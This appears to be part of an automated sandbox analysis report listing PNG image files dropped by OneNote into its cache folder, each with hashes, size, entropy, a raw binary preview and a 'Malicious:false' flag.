                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1657
                                                                                                                                                    Entropy (8bit):7.80882577056055
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                    MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                    SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                    SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                    SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2210
                                                                                                                                                    Entropy (8bit):7.86853667196985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                    MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                    SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                    SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                    SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14458
                                                                                                                                                    Entropy (8bit):7.944094738048628
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                    MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                    SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                    SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                    SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13030
                                                                                                                                                    Entropy (8bit):7.948664903731204
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                    MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                    SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                    SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                    SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3879
                                                                                                                                                    Entropy (8bit):7.9281351307465044
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                    MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                    SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                    SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                    SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19235
                                                                                                                                                    Entropy (8bit):7.944867159042578
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                    MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                    SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                    SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                    SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7374
                                                                                                                                                    Entropy (8bit):7.955141875077912
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                    MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                    SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                    SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                    SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5386
                                                                                                                                                    Entropy (8bit):7.943706538857394
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                    MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                    SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                    SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                    SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.950380155401321
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                    MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                    SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                    SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                    SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14553
                                                                                                                                                    Entropy (8bit):7.951135681293377
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                    MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                    SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                    SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                    SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8184
                                                                                                                                                    Entropy (8bit):7.807848176906598
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                    MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                    SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                    SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                    SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                    Malicious:false
